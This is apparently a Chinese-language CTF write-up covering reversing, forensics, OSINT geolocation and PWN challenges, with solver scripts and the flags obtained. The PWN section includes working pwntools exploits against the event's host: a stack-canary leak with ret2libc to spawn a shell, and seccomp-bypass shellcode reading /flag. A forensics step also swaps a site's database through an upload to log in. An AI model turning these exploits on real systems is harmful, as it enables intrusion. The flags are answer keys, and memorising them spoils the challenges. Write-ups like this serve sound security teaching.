if (!MainActivity.this.checkSN(MainActivity.this.edit_userName.trim(), MainActivity.this.edit_sn.getText().toString().trim())) {
Toast.makeText(MainActivity.this, (int) R.string.unsuccessed, 0).show();
return;
}
Toast.makeText(MainActivity.this, (int) R.string.successed, 0).show();
MainActivity.this.btn_register.setEnabled(false);
MainActivity.this.setTitle(R.string.registered);
}
});
}
@Override // android.app.Activity
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.activity_main, menu);
return true;
}
/* JADX INFO: Access modifiers changed from: private */
public boolean checkSN(String userName, String sn) {
if (userName != null) {
try {
if (userName.length() == 0 || sn == null || sn.length() != 22) {
return false;
}
MessageDigest digest = MessageDigest.getInstance("MD5");
digest.reset();
digest.update(userName.getBytes());
byte[] bytes = digest.digest();
String hexstr = toHexString(bytes, "");
StringBuilder sb = new StringBuilder();
for (int i = 0; i < hexstr.length(); i += 2) {
sb.append(hexstr.charAt(i));
}
String userSN = sb.toString();
return new StringBuilder().append("flag{").append(userSN).append("}").toString().equalsIgnoreCase(sn);
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
return false;
}
}
return false;
}
private static String toHexString(byte[] bytes, String separator) {
StringBuilder hexString = new StringBuilder();
for (byte b : bytes) {
String hex = Integer.toHexString(b & 255);
if (hex.length() == 1) {
hexString.append('0');
}
hexString.append(hex).append(separator);
}
return hexString.toString();
}
}
可以看到flag{}中间就是userSN,userSN是上面的要求输入的序列号
长度是22位
进入后进行md5加密
byte[] bytes = digest.digest();把加密后的值转成字符串,然后只取每个字节的高位。
所以我们要先确定用户名,代码已经给了用户名了
this.edit_userName = “Tenshine”
接着md5加密
转成字符串再转16进制,取每个字节的高位
import hashlib
def generate_sn(userName):
# 计算MD5哈希
md5_hash = hashlib.md5(userName.encode()).hexdigest()
# 取每两个字符的第一个字符
userSN = ''.join([md5_hash[i] for i in range(0, len(md5_hash), 2)])
# 返回拼接后的flag
return f"flag{{{userSN}}}"
# 使用用户名 "Tenshine"
userName = "Tenshine"
sn = generate_sn(userName)
print("生成的序列号:", sn)
# 生成的序列号: flag{bc72f242a6af3857}
re1
(签到)
打开IDA直接看到flag
flag{7ujm8ikhy6}
shuangyuCTF-Baidu
打开题目
是一个wenb界面
去翻一下,在css里面翻到aes密码加密钥
去解密
直接早百度框输入密码 the_ultimate_password123
回显
访问后下载附件
http://sec.54cto.com/password_checker
upx壳直接脱壳
upx -d 文件名
这边通过mian,汇编定位到showflag 这个函数里面有加密逻辑
unsigned __int64 __fastcall showflag(const char *a1)
{
int i; // [rsp+1Ch] [rbp-24h]
_WORD v3[12]; // [rsp+20h] [rbp-20h] BYREF
unsigned __int64 v4; // [rsp+38h] [rbp-8h]
v4 = __readfsqword(0x28u);
strcpy((char *)v3, "fneg儂mzsj_}o厞_唹悏}");
v3[11] = 0;
for ( i = 0; i <= 20; ++i )
{
if ( i + (i ^ (unsigned __int8)a1[i]) != *((unsigned __int8 *)v3 + i) )
{
puts("error");
return __readfsqword(0x28u) ^ v4;
}
}
printf("Good. Your input is flag: %s\n", a1);
return __readfsqword(0x28u) ^ v4;
}
汇编代码块
.text:0000000000400607 ; =============== S U B R O U T I N E =======================================
.text:0000000000400607
.text:0000000000400607 ; Attributes: bp-based frame
.text:0000000000400607
.text:0000000000400607 ; unsigned __int64 __fastcall showflag(const char *)
.text:0000000000400607 public showflag
.text:0000000000400607 showflag proc near ; CODE XREF: .text:0000000000400741↓p
.text:0000000000400607
.text:0000000000400607 var_38 = qword ptr -38h
.text:0000000000400607 var_24 = dword ptr -24h
.text:0000000000400607 var_20 = byte ptr -20h
.text:0000000000400607 var_8 = qword ptr -8
.text:0000000000400607
.text:0000000000400607 ; __unwind {
.text:0000000000400607 push rbp
.text:0000000000400608 mov rbp, rsp
.text:000000000040060B sub rsp, 40h
.text:000000000040060F mov [rbp+var_38], rdi
.text:0000000000400613 mov rax, fs:28h
.text:000000000040061C mov [rbp+var_8], rax
.text:0000000000400620 xor eax, eax
.text:0000000000400622 mov qword ptr [rbp+var_20], 0
.text:000000000040062A mov qword ptr [rbp+var_20+8], 0
.text:0000000000400632 mov qword ptr [rbp+var_20+10h], 0
.text:000000000040063A mov [rbp+var_20], 66h ; 'f'
.text:000000000040063E mov [rbp+var_20+1], 6Eh ; 'n'
.text:0000000000400642 mov [rbp+var_20+2], 65h ; 'e'
.text:0000000000400646 mov [rbp+var_20+3], 67h ; 'g'
.text:000000000040064A mov [rbp+var_20+4], 83h
.text:000000000040064E mov [rbp+var_20+5], 7Ah ; 'z'
.text:0000000000400652 mov [rbp+var_20+6], 6Dh ; 'm'
.text:0000000000400656 mov [rbp+var_20+7], 7Ah ; 'z'
.text:000000000040065A mov [rbp+var_20+8], 73h ; 's'
.text:000000000040065E mov [rbp+var_20+9], 6Ah ; 'j'
.text:0000000000400662 mov [rbp+var_20+0Ah], 5Fh ; '_'
.text:0000000000400666 mov [rbp+var_20+0Bh], 7Dh ; '}'
.text:000000000040066A mov [rbp+var_20+0Ch], 6Fh ; 'o'
.text:000000000040066E mov [rbp+var_20+0Dh], 85h
.text:0000000000400672 mov [rbp+var_20+0Eh], 8Ah
.text:0000000000400676 mov [rbp+var_20+0Fh], 5Fh ; '_'
.text:000000000040067A mov [rbp+var_20+10h], 86h
.text:000000000040067E mov [rbp+var_20+11h], 89h
.text:0000000000400682 mov [rbp+var_20+12h], 90h
.text:0000000000400686 mov [rbp+var_20+13h], 89h
.text:000000000040068A mov [rbp+var_20+14h], 7Dh ; '}'
.text:000000000040068E mov [rbp+var_24], 0
.text:0000000000400695 jmp short loc_4006D7
.text:0000000000400697 ; ---------------------------------------------------------------------------
(就是这个字符有点奇怪是中文的)
写解密脚本
def reverse_flag():
# 字节数组,根据 var_20, var_18, var_10 提取的内容
v3 = [
0x66, 0x6E, 0x65, 0x67, 0x83, 0x7A, 0x6D, 0x7A, # var_20
0x73, 0x6A, 0x5F, 0x7D, 0x6F, 0x85, 0x8A, 0x5F, # var_18
0x86, 0x89, 0x90, 0x89, 0x7D # var_10
]
flag = []
for i in range(len(v3)):
# 反推 a1[i],使用公式 a1[i] = i ^ (v3[i] - i)
a1_char = chr(i ^ (v3[i] - i))
# 检查是否为可打印的 ASCII 字符
if 32 <= ord(a1_char) <= 126:
flag.append(a1_char)
else:
flag.append('?') # 如果是不可打印字符,用 ? 代替
# 返回符合 flag{} 格式的字符串
return ''.join(flag)
# 输出反推的 flag
print(reverse_flag())
# flag{patch_your_file}
pyc
打开题目
发现是python使用pyinstxtractor.py解包
在使用uncompyle6反编译pyc 这里反编译1.pyc
拿到解密数据
# uncompyle6 version 3.9.1
# Python bytecode version base 3.7.0 (3394)
# Decompiled from: Python 3.9.13 (tags/v3.9.13:6de2ca5, May 17 2022, 16:36:42) [MSC v.1929 64 bit (AMD64)]
# Embedded file name: 1.py
def check():
a = input("plz input your flag:")
c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
if len(a) != 42:
print("wrong length")
return 0
b = 179
for i in range(len(a)):
if ord(a[i]) * 33 % b != c[i]:
print("wrong")
return
print("win")
check()
整体验证逻辑有了,写解密脚本
def mod_inverse(a, m):
"""扩展欧几里得算法求模逆元"""
m0, x0, x1 = m, 0, 1
if m == 1:
return 0
while a > 1:
q = a // m
m, a = a % m, m
x0, x1 = x1 - q * x0, x0
if x1 < 0:
x1 += m0
return x1
def reverse_check():
c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
b = 179
inv_33 = mod_inverse(33, b)
a = ""
for i in range(len(c)):
# 反推出 ord(a[i])
ord_a = (c[i] * inv_33) % b
a += chr(ord_a)
print(f"反推出的字符串是: {a}")
reverse_check()
# 反推出的字符串是: flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}
forensics
签到
flag{nsdf-wwsfmx-poermgg-sdfkwas}
好吃的可乐
地址:福建省福州市鼓楼区杨桥东路15-1号
base64:56aP5bu655yB56aP5bee5biC6byT5qW85Yy65p2o5qGl5Lic6LevMTUtMeWPtw==
flag{56aP5bu655yB56aP5bee5biC6byT5qW85Yy65p2o5qGl5Lic6LevMTUtMeWPtw==}
shuangyuCTF-白小鱼
打开流量包
根据提示在里面的里面,进入到网站
大概看了一下需要登录账号密码
没啥思路,在源码看到上传的源码,取消注释,抓包上传
(这里本来想传🐎上去,然后发现是python…)
这里的方法是上传一个database.db数据库,替换原来的数据库
导出后命名为database.db,然后上传
上传成功后使用自己设置的密码登录
china
直接识图
flag{台湾省台中市海天桥}
Canada
google给我搜死了😭
最后连接 蒙特利尔, 魁北克省 - Google 地图
45.4396221,-73.6501553
45.439,73.650
md5(45.439,73.650)
flag{e8e5a0a3a214bc2e393ad9aeb5aaecbb}
image
给了张图片,仔细观察图片可以看到电线杆上写了元町312
去goole地图进行寻找
Yamate hondori - Google 地图
35.435846,139.645113
35.435,139.645
md5(35.435,139.645)
flag{7a0a192c47ae21cbfb4d0b03dc842316}
最后一题
PWN
真*签到
nc连接上发现过滤掉了好多东西
使用 /???/??? ????
进行通配
具体文章参考 2023届的信安大挑战——pwn(更新不了一点,远端打不了力) - Falling_Dusk - 博客园 (cnblogs.com)
pwn签到
拿到题目进行反编译看看
查看一下保护
这里就尝试泄漏canary,使用ret2libc来使用
由于没有说明libc。可以使用libcsearcher来写
from pwn import *
from LibcSearcher import *
context(log_level='debug')
def duan():
gdb.attach(p)
pause()
file = './signin'
# libcf= './libc.so.6'
#p=process(file)
p = remote('ctf.54cto.com',50899)
elf=ELF(file)
# libc=ELF(libcf)
plt = elf.plt['puts']
got = elf.got['puts']
main = elf.sym['main']
rdi = 0x40071e
ret = 0x400596
binsh = 0x600CF0
p.recvuntil('name:')
p.sendline(b'/bin/sh')
#duan()
p.sendline(b'a'*24)
canary = u64(p.recvuntil(b'\x50')[-9::][:-1:]) - 0x0a
print(hex(canary))
log.success('canary is '+hex(canary))
payload1 = b'a'*(0x20-8) + p64(canary) + p64(1) + p64(rdi)+p64(got)+p64(plt)+p64(main)
p.sendline(payload1)
real_add = u64(p.recvuntil(b'\x7f')[-6::].ljust(8,b'\x00'))
log.success(f'real is {hex(real_add)}')
#base = real_add - libc.sym['puts']
#system = base + libc.sym['system']
#libsh = base + next(libc.search(b'/bin/sh\x00'))
libc = LibcSearcher('puts',real_add)
base = real_add - libc.dump('puts')
system = base + libc.dump('system')
libsh = base + libc.dump('str_bin_sh')
log.success('canary is '+hex(canary))
log.success(f'system is {hex(system)}')
#log.success(f'libsh is {hex(libsh)}')
payload2 = b'a'*(0x20-8) + p64(canary) + p64(1)
payload2 += p64(ret)
payload2 += p64(rdi)
payload2 += p64(libsh)
payload2 += p64(system)
p.recvuntil('name:')
p.sendline(b'/bin/sh')
p.sendline(b'a')
p.recvuntil(b'Say something: ')
p.sendline(payload2)
p.interactive() #0xed0e313bf32c2700
一共可以输入三次,第一次用来泄漏canary,第二次是泄漏puts地址,第三次构造后门来执行,得到flag
flag{159854c2-d757-4ed2-a3ab-a61317985c2c}
ez_sandbox
拿到题目反编译看一下mian函数
看一下有没有保护
main这里是写入shellcode执行,但是存在seccomp机制
看一下是否存在orw
禁用read write open exec
尝试使用其他可以替换的
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
file='./sandbox'
#p=process(file)
p=remote('ctf.54cto.com',50865)
elf=ELF(file)
shellcode=shellcraft.openat(0,'/flag',0)
shellcode+=shellcraft.mmap(0x10000,0x100,1,1,'eax',0)
shellcode+=shellcraft.sendfile(1,3,0,0x100)
shellcode=asm(shellcode)
p.sendlineafter('input shellcode: \n',shellcode)
p.interactive()
运行,得到flag
flag{69d45d54-b2a5-4e00-b29a-0d2ea3ae0952}